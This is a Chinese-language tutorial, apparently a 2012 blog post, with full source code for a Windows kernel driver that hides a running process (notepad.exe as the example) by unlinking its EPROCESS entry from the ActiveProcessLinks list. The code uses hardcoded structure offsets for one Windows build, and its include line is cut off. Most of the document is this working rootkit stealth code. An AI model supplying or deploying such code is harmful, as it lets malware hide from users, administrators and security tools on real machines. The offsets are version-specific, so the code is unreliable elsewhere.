在windows内核模式下隐藏进程

进程隐藏之内核实现

1、在内核模式下，系统为每个进程维护了一个EPROCESS结构体，系统所有的进程是通过EPROCESS结构体中的一个ActiveProcessLinks指向的双端链表连接起来的，通过winDBG内核调试工具就可以发现并获取其相对于EPROCESS结构体的地址(0x88)，这样我们可以通过遍历该循环链表找到我们的目的进程将其链表的节点删除即可隐藏该进程。（EPROCESS中进程PID相对地址为ox84，进程名字相对地址为0x174）。

代码如下:

/****************************
   在内核模式下隐藏进程
      sky_2012.12.13
****************************/

#include 
#define DWORD ULONG

void DriverUnload(IN PDRIVER_OBJECT Driver_Object);
NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
								 IN PIRP pIrp);

//根据进程Pid找到进程
DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg);

ANSI_STRING Process_Name;

NTSTATUS DriverEntry(IN PDRIVER_OBJECT Driver_Object,
					 IN PUNICODE_STRING RegisterPath)
{
	
	PLIST_ENTRY  pre_ActiveProcessLink;
	int flg = 0;
	DWORD preprocess = 0x00000000;
	CHAR *string1 = "notepad.exe";
	
	Driver_Object->MajorFunction[IRP_MJ_CREATE] = HelloDDKDispatchRoutine;
	Driver_Object->MajorFunction[IRP_MJ_CLOSE]  = HelloDDKDispatchRoutine;
	Driver_Object->DriverUnload = DriverUnload;
	
	//找到我们要保护的进程的前一个的EPROCESS
	
	RtlInitAnsiString(&Process_Name,string1);


	preprocess = FindProcessEPROCESS(&Process_Name,&flg);

	
	//根据进程的ActiveProcessLink删除掉我们的目的进程的ActiveProcessLink的连表节点
	if(flg)
	{
		pre_ActiveProcessLink = (PLIST_ENTRY)(preprocess);
		pre_ActiveProcessLink->Flink = pre_ActiveProcessLink->Flink->Flink;
		pre_ActiveProcessLink->Flink->Blink = pre_ActiveProcessLink;
		KdPrint(("Delete Success!\n"));
	}
	else
	{
		KdPrint(("notepad.exe dos'nt exist!\n"));
	}
	
	return STATUS_SUCCESS;
}


DWORD FindProcessEPROCESS(PANSI_STRING PsName, OUT int* flg)
{
	ANSI_STRING CurName;
	PLIST_ENTRY   cut_ActiveProcessLink = 0x00000000;
	DWORD CUR_EPROCESS = 0x00000000;
	DWORD curent_id = 0;//记录当前id
	DWORD start_id =0;
	int count = 0;//记录id总数
	CUR_EPROCESS = (DWORD)PsGetCurrentProcess();
	curent_id = *((DWORD*)(CUR_EPROCESS + 0x84));
	start_id = curent_id;

	RtlInitAnsiString(&CurName,(char*)CUR_EPROCESS + 0x174);
	cut_ActiveProcessLink = (PLIST_ENTRY)(CUR_EPROCESS + 0x88);
	//如果相同
	if(!RtlCompareString(PsName, &CurName,FALSE))
	{
		*flg = 1;
		return ((DWORD)(cut_ActiveProcessLink->Blink));
	}
	//接着遍历
	while(1)
	{
		count++;
		cut_ActiveProcessLink = cut_ActiveProcessLink->Flink;
		RtlInitAnsiString(&CurName,(char*)cut_ActiveProcessLink - 0x88 + 0x174);

		curent_id = *((DWORD*)((DWORD)cut_ActiveProcessLink - 0x88 + 0x84));
		if(!RtlCompareString(PsName,&CurName,FALSE))
		{
			*flg = 1;
			return ((DWORD)(cut_ActiveProcessLink->Blink));
		}
		else if (count>=1&&(start_id == curent_id))
		{
			KdPrint(("没有找到!\n"));
			return 0x00000000;
		}
	}
}

//默认的例程

NTSTATUS HelloDDKDispatchRoutine(IN PDEVICE_OBJECT pDevObj,
								 IN PIRP pIrp)
{
	NTSTATUS status = STATUS_SUCCESS;
	KdPrint(("Enter HelloDDKDispatchRoutine\n"));
	// 完成IRP
	pIrp->IoStatus.Status = status;
	IoCompleteRequest(pIrp, IO_NO_INCREMENT );
	KdPrint(("Leave HelloDDKDispatchRoutine\n"));
	return status;
}

//设置卸载例程
void DriverUnload(IN PDRIVER_OBJECT Driver_Object)
{
	KdPrint(("DriverUnload!\n"));
}